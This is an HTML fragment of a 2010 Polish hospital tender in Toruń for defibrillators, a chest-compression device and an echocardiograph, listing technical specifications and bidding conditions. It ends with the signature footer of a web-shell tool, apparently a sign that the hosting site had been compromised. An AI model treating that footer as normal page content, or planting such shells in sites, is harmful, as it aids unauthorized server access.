<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien dostarczyć:<br>
a/ wpis do Rejestru Wyrobów Medycznych lub deklarację zgodności CE potwierdzającą, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.);<br>
b/ foldery, katalogi/ prospekty oferowanych wyrobów.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.<br>
<br>
Zamówienie finansowane w ramach projektu nr PL 0480 pn. /Zwiększenie dostępności do wysokospecjalistycznej opieki kardiologicznej w Wojewódzkim Szpitalu Zespolonym w Toruniu/. Finansowanie w 85% z Mechanizmu Finansowania EOG i w 15% z budżetu Samorządu Województwa Kujawsko-Pomorskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa 2 szt. defibrylatorów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - dostawa 2 szt. defibrylatorów:<br>
1. Zasilanie akumulatorowe, w zestawie minimum trzy akumulatory litowo-jonowe bez efektu pamięci; 
2.Ilość wyładowań (praca na akumulatorach) przy mocy 360 J i temperaturze otoczenia 20oC - min. 360 wyładowań lub min. 330 minut ciągłego monitorowania EKG;
3. Ładowarka do akumulatorów zintegrowana z defibrylatorem lub oddzielna: zasilana 220 V;
4. Masa całkowita defibrylatora gotowego do pracy nie większa niż 10 kg;
5. Aparat wyposażony w ekran kolorowy LCD  o przekątnej min. 8,0 cali;
6. Wyświetlanie co najmniej 3 krzywych dynamicznych;
7. Monitorowanie EKG z 12 odprowadzeń z funkcją doradczą biorącą pod uwagę podczas analizy: wiek i płeć pacjenta;
8. Wzmocnienie sygnału EKG: 0,25; 0,5; 1,0; 1,5; 2,5; 3,0; 4,0 cm/mV;
9. Prezentacja tętna w zakresie min.: od 20 do 300 uderzeń na minutę;
10. Rodzaj fali defibrylującej: dwufazowa - z kompensacją impedancji ciała pacjenta, poziom energii defibrylacji w zakresie: co najmniej od 2 J do 360 J;
11. Dostępne minimum 24 różne poziomy energii;
12. Kardiowersja;
13. Defibrylacja ręczna;
14. Defibrylacja półautomatyczna, możliwość programowania energii 1, 2 i 3 wyładowania min w przedziale od: 150 do 330 J;
15. Funkcja stymulacji zewnętrznej z możliwością wykonania stymulacji w trybach na /żądanie/ i asynchronicznym;
16. Wyjściowe natężenie prądu, co najmniej w zakresie od 0 do 200 mA;
17. Częstość stymulacji minimum: od 40 do 170 impulsów na minutę.;
18. Nieinwazyjny pomiar ciśnienia tętniczego;
19. Zakres ciśnienia tętniczego:
Skurczowe min.: od 30 do 240,
Rozkurczowe min.: od 15 do 210,
Średnie min.: od 20 do 220;
20. Prezentacja tętna w zakresie min.: od 30 do 220 uderzeń na minutę;
21. Pomiar saturacji SpO2 w zakresie minimum od: 50% do 100%;
22. Pulsoksymetr: zakres częstości tętna min.: od 25 do 240 uderzeń na minutę;
23. Krzywa SpO2 z automatyczną regulacją wzmocnienia;
24. Metronom;
25. Wewnętrzna pamięć z możliwością archiwizacji odcinków krzywych EKG oraz przebiegu pracy: minimum 330 minut ciągłego EKG;
26. Alarmy monitorowanych funkcji;
27. Defibrylator gotowy do pracy bez dodatkowych nakładów (zawiera wszystkie kable, łączniki potrzebne do uruchomienia wszystkich jego funkcji);
28. Układ monitorujący zabezpieczony przed impulsem defibrylatora;
29. Wbudowany rejestrator termiczny, szerokość papieru min: 95 mm;
30. Wbudowany moduł Bluetooth;
31. Temperatura pracy: min od 0 do +45oC;
32. Wodoodporność/odporność na kurz: norma IP44;
33. Komunikacja z użytkownikiem w języku polskim (dotyczy również opisów na panelu sterowania, oraz wydawanych przez aparat komunikatów głosowych); 
34. Gwarancja - min. 24 miesiące;
35. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
36. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika; 
37. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
38. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie; 
39. Bezpłatna instalacja urządzenia;
40. Defibrylator zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
41. Sposób dezynfekcji urządzenia; 
42. Numer kontaktowy z serwisem Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 1 szt. urządzenia do mechanicznej kompresji klatki piersiowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - dostawa 1 szt. urządzenia do mechanicznej kompresji klatki piersiowej:<br>
1. Urządzenie do kompresji klatki piersiowej za pomocą tłoka mechanicznego napędzanego elektrycznie;
2. Ilość ucisków na minutę: 100 +/- 5 %;
3. Głębokość ucisku: 4-5 cm;
4. Urządzenie zasilane akumulatorem litowo-jonowym, o pojemności 3,3 Ah, bez efektu /pamięci/;
5. Minimum 40 minut pracy na pojedynczym, w pełni naładowanym akumulatorze;
6. Możliwość podłączenia do sieci 230 V;
7. Dopuszczalna szerokość klatki piersiowej pacjenta, min: 44 cm;
8. Urządzenie przenośne, dopuszczalna maksymalna waga wraz z torbą i akumulatorem: 10 kg;
9. Norma IP 44: odporność na kurz i zachlapania;
10. Dodatkowe akcesoria: 
 - torba do bezpiecznego transportu urządzenia,
 - kabel umożliwiający podłączenie do sieci 230 V,
 - jednorazowe nakładki na tłok - 2 szt.,
 - pasek do podtrzymywania głowy pacjenta podczas transportu,
 - pasek zabezpieczający ramiona pacjenta podczas transportu - 2 szt.;
11. Okres gwarancji - min 24 miesiące;
12. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
13. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
14. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
15. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
16. Aparat  zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
17. Bezpłatna instalacja urządzenia; 
18. Sposób dezynfekcji urządzenia;
19. Numer kontaktowy z serwisem Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa 1 szt. echokardiografu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - dostawa 1 szt. echokardiografu:<br>
I. PARAMETRY OGÓLNE 
1. Aparat stacjonarny na kołach z układem blokowania kół;
2. Zasilanie sieciowe 220-240V 50-60 Hz;
3. Minimalny zakres częstotliwości pracy aparatu od 1 do 15 MHz;
4. Maksymalna głębokość obrazowania min. 30 cm;
5. Częstotliwość odświeżania obrazu (frame rate) w trybie 2D 500 fps;
6. Dynamika wzmocnienia min. 180 dB; 
7. Monitor wysokiej rozdzielczości o przekątnej min. 20 cali o matrycy min. 1 MPixel; 
8. Monitor z możliwością:
- obrotu względem klawiatury,
- pochylenia,
- zmiany położenia w poziomie;
9. Regulacja w zakresie podnoszenia i  obniżania klawiatury wraz z monitorem;
10. Regulacja obrotu klawiatury. Blokada ustawionego położenia monitora i klawiatury;
11. Minimalna ilość niezależnych kanałów przetwarzania 50 000;
12. Minimalny zakres częstotliwości głowic 1,0-15,0 MHz;
13. Całkowita waga aparatu bez urządzeń peryferyjnych maks. 160 kg;
14. Całkowicie cyfrowy układ formowania wiązki ultradźwiękowej;
15. Konstrukcja umożliwiająca rozbudowę aparatu bez jego wymiany;
16. Niezależne gniazda do podłączenia głowic obrazowych min. 3;
17. Gniazdo do podłączenia głowicy ołówkowej /ślepego/ Dopplera cw;
18. Rejestracja pojedynczych klatek oraz pętli o regulowanej długości czasu trwania;
19. Pamięć indywidualnych ustawień aparatu dla poszczególnych jego użytkowników niezależna dla różnych aplikacji;
20. Cyfrowa drukarka termiczna czarno biała małoformatowa;
21. Podświetlane przełączniki funkcyjne;
II. TRYBY PRACY
1. 2D;
2. Obrazowanie w technice drugiej harmonicznej;
3. Automatyczna optymalizacja obrazu 2D za pomocą jednego przycisku w zależności od treści obrazu;
4. Powiększenie obrazów 2D (zoom) na obrazie rzeczywistym i zatrzymanym min. 10 krotnie;
5. Tryb 2D wyświetlany razem z M-modem oraz wyświetlanie tylko M-modu;
6. Kolor M-mode;
7. Jednoczesna prezentacja w czasie rzeczywistym na ekranie podzielonym na dwa obrazu 2D czarno białego oraz obrazu 2D z kolorowym Dopplerem;
8. Doppler spektralny z falą pulsacyjną;
9. Maksymalna mierzona prędkość przepływu przy zerowym kącie korekcji 6,5 m/s;
10. Doppler wielobramkowy;
11. Zakres regulacji kąta ? 0-90 stopni;
12. Zakres regulacji wielkości bramki min. 1-20 mm;
13. Automatyczna optymalizacja obrazu spektrum dopplerowskiego przy pomocy jednego przycisku;
14. Automatyczny obrys widma dopplerowskiego na obrazie ruchomym oraz zatrzymanym z wyliczeniem wskaźnika rezystywności i pulsacyjności;
15. Doppler spektralny z falą ciągłą;
16. Sterowany pod kontrolą obrazu 2D;
17. Maksymalna mierzona prędkość przy zerowym kącie min. 16 m/s;
18. Kolor Doppler;
19. Automatyczna regulacja częstotliwości pracy w Dopplerze kolorowym w zależności od głębokości położenia rejonu zainteresowania ROI;
20. Power Doppler;
21. Kolorowy Doppler Tkankowy;
22. Tkankowy Doppler spektralny;
23. Częstotliwość odświeżania obrazu (frame rate) w trybie Dopplera tkankowego min. 350 fps;
24. Prezentacja na ekranie EKG badanego pacjenta;
25. Kabel EKG na elektrody samoprzylepne;
III. ARCHIWIZACJA
1. Archiwizacja raportów z badań, obrazów i pętli obrazowych na wewnętrznym dysku twardym min. 120 GB;  
2. Zainstalowany w echokardiografie napęd dysków DVD do zapisu obrazów, pętli obrazowych i raportów badania w formatach JPG, avi i DICOM;
3. Zapis obrazów i pętli obrazowych na nośnikach pamięci typu pendrive USB oraz zewnętrznych dyskach twardych USB HDD;
4. Moduł do eksportu obrazów i pętli obrazowych do sieci LAN w formacie DICOM 3.0;
5. Współpraca z istniejącym systemem archiwizacji danych:  -   możliwość przekazywania raportów strukturalnych w zakresie danych pacjenta, pomiarów, obliczeń, -   możliwość przekazywania komentarzy. 
IV. GŁOWICE
1. Sektorowa, szerokopasmowa do badań kardiologicznych; 
2. Częstotliwość pracy od 1 do 5 MHz z tolerancją ? 0,5 MHz;
3. Ilość aktywnych elementów min. 80; 
4. Głębokość obrazowania 24 cm;
5. Obrazowanie w trybie drugiej harmonicznej;
6. Współpraca z głowicami trantorakalnymi przy aparacie już eksploatowanym iE33;
7. Współpraca z głowicą przezprzełykową współpracującą z aparatem już eksploatowanym iE33;
8. Liniowa, szerokopasmowa do badań naczyniowych;
9. Częstotliwość pracy głowicy w granicach 11 do 3 MHz z tolerancją ? 0,5 MHz;
10. Obrazowanie w trybie drugiej harmonicznej;
11. Obrazowanie trapezowe;
V. PAKIET POMIAROWO OBLICZENIOWY
1. Pomiary i obliczenia kardiologiczne;
2. W trybie 2D:
RVIDd, IVSs,IVSd,LVIDd,LVIDs,LVPWd,EF met. uproszczoną Simpsona, metodą dysków z jednej lub dwóch projekcji koniuszkowych, SV, CO, LVEDV, LVESV, LV mass; 
3. W trybie M-model: 
RVIDd, IVSs, IVSd, LVIDd, LVIDs, LVPWd, EF met. Teiholza, LA diam, Ao root, Ao Asc;
4. W trybie Dopplera:
Prędkości i gradienty maksymalne i średnie przez cztery ujścia oraz E/A, MVA,AVA, Qp/Qs, PISA;
5. Uzupełnienie kardiologicznego pakietu pomiarowo obliczeniowego o pomiary zdefiniowane przez użytkownika widoczne następnie w wyniku badania; 
6. Uzupełnienie kardiologicznego pakietu pomiarowo obliczeniowego o formuły obliczeniowe zdefiniowane przez użytkownika widoczne następnie w wyniku badania;
7. Pomiary i obliczenia naczyniowe;
8. Pomiary w badaniach naczyniowych PS, ED, PI, RI, akceleracja, HR;
9. Raport z badania kardiologicznego;
10. Raport z badania naczyniowego;
11. Oprogramowanie do echokardiograficznej próby obciążeniowej min. 10 projekcji, min. 8 etapów w każdej projekcji;
VI.	MOŻLIWOŚCI ROZBUDOWY APARATU
1. Możliwość rozbudowy systemu o moduł obrazowania 3D w czasie rzeczywistym (tzw 4D lub Live 3D);
2. Możliwość rozbudowy systemu o moduł szybkiej rekonstrukcji 3D obrazu Dopplera kolorowego;
3. Moduł obliczeniowy odkształceń (strain i strain rate) w oparciu o technikę Dopplera tkankowego;
4. Moduł obliczeniowy odkształceń (strain i strain rate) w oparciu o techniki nie dopplerowskie;
VII. WYPOSAŻENIE DODATKOWE 
1. Dodatkowa klawiatura;
2. Stanowisko do badań echokardiograficznych:
1. Fotel - 1 szt.: 
- teleskopowa regulacja wysokości siedziska,
- chromowana konstrukcja z obręczą umożliwiającą podparcie stóp,
- siedzisko stabilne, obrotowe, z podparciem pleców wymuszające prawidłową pozycję siedzącego poprzez stabilizację miednicy i tułowia,
- pokrycie siedziska i oparcia wykonane z materiału, łatwego do utrzymania w czystości (kolor do uzgodnienia z Zamawiającym) 
2. Fotel - 2 szt.:
- teleskopowa regulacja wysokości siedziska,
- chromowana konstrukcja z obręczą umożliwiającą podparcie stóp,
- siedzisko stabilne w trzech płaszczyznach, umocowane na pojedynczej sprężynie, wymuszające prawidłową pozycję siedzącego poprzez stabilizację miednicy i tułowia,
- oparcie poruszające się niezależnie od siedziska (obrót o 360 stopni względem siedziska),
- pokrycie siedziska i oparcia wykonane z antybakteryjnego materiału, łatwego do utrzymania w czystości (kolor do uzgodnienia z Zamawiającym), 
- waga 15 kg (+/-1 kg),
- konstrukcja krzesła zgodna z normami EN 1335-1, EN 1335-2, EN 1335-3.
3. Stół - 1 szt.:
   - stół dzielony na dwa segmenty: odcinek dla tułowia i dolnych części ciała, 
   - konstrukcja ze stali, pokryta lakierem proszkowym,  
   - stół na kółkach z możliwością blokowania każdego kółka z osobna, 
   - długość blatu: min. 185 cm,
   - szerokość blatu: min. 76 cm,
   - wysokość blatu: 
    regulowana w granicach min. 40 cm,   
    minimalna osiągalna nie większa niż: 59 cm,
   - oparcie regulowane od 0 stopni do 80 stopni,
   - obciążenie stołu do 220 kg,
   - pilot do sterowania wysokości i pozycji oparcia, 
   -  konstrukcja blatu stołu z wycięciami umożliwiającymi złożenie części blatu aby zwiększyć dostęp lekarza do pacjenta,
   -  materac wykonany z gumy piankowej, pokryty materiałem nienasiąkliwym i łatwy do utrzymania w czystości - grubość min. 5 cm dla części tułowia i min. 8 cm dla dolnych części ciała,
  - co najmniej dwa pasy ograniczające ruch pacjenta;
3. Zasilacz UPS  dostosowany do echokardiografu - 1 szt.;
4. Zasilacz UPS  min. 2 000 VA  - 1 szt.;
5. Drukarka laserowa kolorowa z print serwerem ( nie gorsza niż HP C1515n);
6. Macierz dyskowa 3 TB - 4 szt.;
VIII WARUNKI GWARANCJI  I SERWISU
1. Okres gwarancji - min 24 miesiące;
2. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
3. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
4. Bezpłatne szkolenie pracowników Zamawiającego obsługującego urządzenie;
5. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6. Bezpłatna instalacja urządzenia;
7. Echokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
8. Sposób dezynfekcji urządzenia;
9. Numer kontaktowy z serwisem Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.23.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość techniczna - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com